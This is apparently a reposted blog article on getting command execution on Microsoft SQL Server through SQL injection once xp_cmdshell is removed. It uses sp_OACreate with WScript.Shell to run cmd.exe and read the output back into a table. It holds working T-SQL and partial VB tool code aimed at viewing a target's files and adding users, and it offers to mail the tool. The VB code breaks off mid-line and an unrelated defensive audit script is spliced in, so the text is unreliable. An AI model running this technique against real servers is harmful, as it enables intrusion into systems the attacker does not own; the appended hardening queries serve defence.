No need XP

xiaoxiao2021-03-06  84

There is an article on my blog that introduces the basic principles and some methods of SQL injection. The part of most interest may be running operating system console commands through the extended stored procedure xp_cmdshell. This method is very simple; just use the following SQL statement:

EXEC master.dbo.xp_cmdshell 'dir c:\'

But more and more database administrators have realized the potential danger of this extended stored procedure. They may delete or change the stored procedure's dynamic link library file, xplog70.dll, and at that point many people give up. Because we can't run any CMD commands, it is difficult to view the other party's files, directories, and running services, and NT users cannot be added.

I have studied this, and later I found that even if xp_cmdshell is not available, it is possible to run CMD on the server and get the result. Here you need to use several SQL Server system stored procedures: sp_OACreate, sp_OAGetProperty and sp_OAMethod. The prerequisite is that WScript.Shell and Scripting.FileSystemObject are available on the server.

sp_OACreate
Creates an instance of an OLE object on an instance of Microsoft® SQL Server™.
Syntax: sp_OACreate progid, | clsid, objecttoken OUTPUT [, context]

sp_OAGetProperty
Gets a property value of an OLE object.
Syntax: sp_OAGetProperty objecttoken, propertyname [, propertyvalue OUTPUT] [, index...]

sp_OAMethod
Calls a method of an OLE object.
Syntax: sp_OAMethod objecttoken, methodname [, returnvalue OUTPUT] [, [@parametername =] parameter [OUTPUT] [...n]]

Idea:

First create a WScript.Shell object on SQL Server and call its Run method, redirecting the output of cmd.exe into a file. Then create a Scripting.FileSystemObject, use it to open a TextStream object on the temporary file, and read the file line by line, adding each row to a temporary table. The following are the corresponding SQL statements:

CREATE TABLE mytmp (info VARCHAR(400), ID INT IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell', @shell OUTPUT
EXEC sp_oamethod @shell, 'run', NULL, 'cmd.exe /c dir c:\ >c:\temp.txt', '0', 'true'
-- Note the 'true' argument of Run: it makes the call wait for the command to finish, and it must be used for long-running commands such as ping.
EXEC sp_oacreate 'scripting.filesystemobject', @fso OUTPUT
EXEC sp_oamethod @fso, 'opentextfile', @file OUT, 'c:\temp.txt'
-- Because the FSO OpenTextFile method returns a TextStream object, @file here is an object token.
WHILE @shell > 0
BEGIN
    EXEC sp_oamethod @file, 'Readline', @out OUT
    INSERT INTO mytmp (info) VALUES (@out)
    EXEC sp_oagetproperty @file, 'AtEndOfStream', @isEnd OUT
    IF @isEnd = 1 BREAK
    ELSE CONTINUE
END
DROP TABLE mytmp

Please refer to SQL Server Books Online for sp_oacreate, sp_oamethod and sp_oagetproperty, and to articles about FSO and WScript. If you need this software, please leave an email address and I will send it to that address.

The following is VB source code for the implementation:

'strCommand: the command to be run, such as "dir c:\"
'strShell: the shell program to call, either "cmd.exe /c" or "command.com /c"
Private Function wsShellExec(ByVal strCommand As String, ByVal strShell As String) As String
On Error GoTo errhandle:
    Dim rsShell As New ADODB.Recordset
    Dim strResult As String
    objConn.Execute "DROP TABLE cmds0001"
    objConn.Execute "CREATE TABLE cmds0001 (Info varchar(400), ID INT IDENTITY(1,1) NOT NULL)"
    Dim strScmdSQL As String
    strScmdSQL = "declare @shell int " & vbCrLf
    strScmdSQL = strScmdSQL & "declare @fso int " & vbCrLf
    strScmdSQL = strScmdSQL & "declare @file int " & vbCrLf
    strScmdSQL = strScmdSQL & "declare @isend bit " & vbCrLf
    strScmdSQL = strScmdSQL & "declare @out varchar(400) " & vbCrLf
    strScmdSQL = strScmdSQL & "exec sp_oacreate 'wscript.shell', @shell output " & vbCrLf
    strScmdSQL = strScmdSQL & "exec sp_oamethod @shell, 'run', null, '" & strShell & " " & Trim(strCommand) & " >c:\bootlog.txt', '0', 'true'" & vbCrLf
    strScmdSQL = strScmdSQL & "exec sp_oacreate 'scripting.filesystemobject', @fso output " & vbCrLf
    strScmdSQL = strScmdSQL & "exec sp_oamethod @fso, 'opentextfile', @file out, 'c:\BOOTLOG.TXT'" & vbCrLf
    strScmdSQL = strScmdSQL & "while @shell > 0 " & vbCrLf
    strScmdSQL = strScmdSQL & "begin " & vbCrLf
    strScmdSQL = strScmdSQL & "
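Removing xp_cmdshell alone leaves the sp_OA* route described above open, so a server audit has to cover both. The following T-SQL is an added example, not code from the original article; it assumes SQL Server 2005 or later (where sys.configurations and the 'Ole Automation Procedures' option exist) and a session with sysadmin rights.

```sql
-- Added audit example; assumes SQL Server 2005+ and a sysadmin session.

-- 1. Is either command-execution surface switched on? (1 = enabled)
SELECT name, CAST(value_in_use AS int) AS enabled
FROM sys.configurations
WHERE name IN (N'xp_cmdshell', N'Ole Automation Procedures');

-- 2. Has EXECUTE on any OLE automation procedure been granted to a
--    non-sysadmin principal, including public? By default nothing is
--    granted, so no rows is the expected result.
SELECT pr.name AS grantee, o.name AS procedure_name,
       pe.state_desc, pe.permission_name
FROM master.sys.database_permissions AS pe
JOIN master.sys.all_objects AS o
     ON o.object_id = pe.major_id AND pe.class = 1
JOIN master.sys.database_principals AS pr
     ON pr.principal_id = pe.grantee_principal_id
WHERE o.name IN (N'sp_OACreate', N'sp_OAMethod', N'sp_OAGetProperty',
                 N'sp_OASetProperty', N'sp_OADestroy',
                 N'sp_OAGetErrorInfo', N'sp_OAStop')
  AND pe.state_desc IN (N'GRANT', N'GRANT_WITH_GRANT_OPTION');

-- 3. Which logins are members of sysadmin? These can call sp_OA*
--    whenever the option is on, regardless of explicit grants.
SELECT m.name AS sysadmin_login, m.type_desc, m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r
     ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m
     ON m.principal_id = rm.member_principal_id
WHERE r.name = N'sysadmin';

-- 4. Switch both surfaces off if nothing legitimate depends on them.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 0;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
```

Disabling the option only holds while the application's login cannot change server settings: a connection running as sysadmin can turn it back on with sp_configure, so the application account belongs outside the list returned by query 3.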

Please credit the original address when reposting: https://www.9cbs.com/read-121024.html
